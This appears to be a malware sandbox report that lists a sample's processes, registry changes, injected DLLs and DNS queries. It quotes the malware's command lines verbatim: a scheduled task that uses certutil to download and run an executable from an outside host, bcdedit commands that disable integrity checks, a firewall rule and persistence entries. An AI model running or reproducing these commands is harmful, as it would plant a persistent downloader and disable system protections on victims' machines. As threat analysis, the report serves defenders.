description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe 584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1684 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 2816 csrss.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe 1736 injector.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1684 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Token: SeImpersonatePrivilege 1684 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Token: SeSystemEnvironmentPrivilege 2816 csrss.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 2808 wrote to memory of 2636 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 35 PID 2808 wrote to memory of 2636 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 35 PID 2808 wrote to memory of 2636 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 35 PID 2808 wrote to memory of 2636 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 35 PID 2636 wrote to memory of 2824 2636 cmd.exe 37 PID 2636 wrote to memory of 2824 2636 cmd.exe 37 PID 2636 wrote to memory of 2824 2636 cmd.exe 37 PID 2808 wrote to memory of 2816 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 38 PID 2808 wrote to memory of 2816 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 38 PID 2808 wrote to memory of 2816 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 38 PID 2808 wrote to memory of 2816 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 38 PID 2788 wrote to memory of 1868 2788 patch.exe 47 PID 2788 wrote to memory of 1868 2788 patch.exe 47 PID 2788 wrote to memory of 1868 2788 patch.exe 47 PID 2788 wrote to memory of 340 2788 patch.exe 49 PID 2788 wrote to memory of 340 2788 patch.exe 49 PID 2788 wrote to memory of 340 2788 patch.exe 49 PID 2788 wrote to memory of 1324 2788 patch.exe 51 PID 2788 wrote to memory of 1324 2788 patch.exe 51 PID 2788 wrote to memory of 1324 2788 patch.exe 51 PID 2788 wrote to memory of 1520 2788 patch.exe 53 PID 2788 wrote to memory of 1520 2788 patch.exe 53 PID 2788 wrote to memory of 1520 2788 patch.exe 53 PID 2788 wrote to memory of 2052 2788 patch.exe 55 PID 2788 wrote to memory of 2052 2788 patch.exe 55 PID 2788 wrote to memory of 2052 2788 patch.exe 55 PID 2788 wrote to memory of 1088 2788 patch.exe 57 PID 2788 wrote to memory of 1088 2788 patch.exe 57 PID 2788 wrote to memory of 1088 2788 patch.exe 57 PID 2788 wrote to memory of 916 2788 patch.exe 59 PID 2788 wrote to memory of 916 2788 patch.exe 59 PID 2788 wrote to memory of 916 2788 patch.exe 59 PID 2788 wrote to memory of 2348 2788 patch.exe 61 PID 2788 wrote to memory of 2348 2788 patch.exe 61 PID 2788 wrote to memory of 2348 2788 patch.exe 61 PID 2788 wrote to memory of 2268 2788 patch.exe 63 PID 2788 wrote to memory of 2268 2788 patch.exe 63 PID 2788 wrote to memory of 2268 2788 patch.exe 63 PID 2788 wrote to memory of 3052 2788 patch.exe 65 PID 2788 wrote to memory of 3052 2788 patch.exe 65 PID 2788 wrote to memory of 3052 2788 patch.exe 65 PID 2788 wrote to memory of 3044 2788 patch.exe 67 PID 2788 wrote to memory of 3044 2788 patch.exe 67 PID 2788 wrote to memory of 3044 2788 patch.exe 67 PID 2788 wrote to memory of 2640 2788 patch.exe 69 PID 2788 wrote to memory of 2640 2788 patch.exe 69 PID 2788 wrote to memory of 2640 2788 patch.exe 69 PID 2788 wrote to memory of 988 2788 patch.exe 71 PID 2788 wrote to memory of 988 2788 patch.exe 71 PID 2788 wrote to memory of 988 2788 patch.exe 71 PID 2816 wrote to memory of 844 2816 csrss.exe 73 PID 2816 wrote to memory of 844 2816 csrss.exe 73 PID 2816 wrote to memory of 844 2816 csrss.exe 73 PID 2816 wrote to memory of 844 2816 csrss.exe 73 PID 2816 wrote to memory of 1512 2816 csrss.exe 75 PID 2816 wrote to memory of 1512 2816 csrss.exe 75 PID 2816 wrote to memory of 1512 2816 csrss.exe 75 PID 2816 wrote to memory of 1512 2816 csrss.exe 75 PID 2816 wrote to memory of 1736 2816 csrss.exe 77 PID 2816 wrote to memory of 1736 2816 csrss.exe 77 PID 2816 wrote to memory of 1736 2816 csrss.exe 77 PID 2816 wrote to memory of 1736 2816 csrss.exe 77 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe"2⤵
- Windows security bypass
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2824
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /51-513⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:1784
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:584
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
PID:1868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:340
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:1324
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
PID:1520
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
PID:2052
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
PID:1088
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
PID:916
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
PID:2348
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
PID:2268
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
PID:3052
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
PID:3044
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
PID:2640
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
PID:988
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:844
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
- Executes dropped EXE
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1736
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241225042424.log C:\Windows\Logs\CBS\CbsPersist_20241225042424.cab1⤵
- Drops file in Windows directory
PID:2376
Network
-
Remote address:8.8.8.8:53Requestninhaine.comIN TXTResponse
-
Remote address:8.8.8.8:53Request2makestorage.comIN TXTResponse
-
Remote address:8.8.8.8:53Requestnisdably.comIN TXTResponsenisdably.comIN TXT.v=spf1 include:_incspfcheck.mailspike.net ?all
-
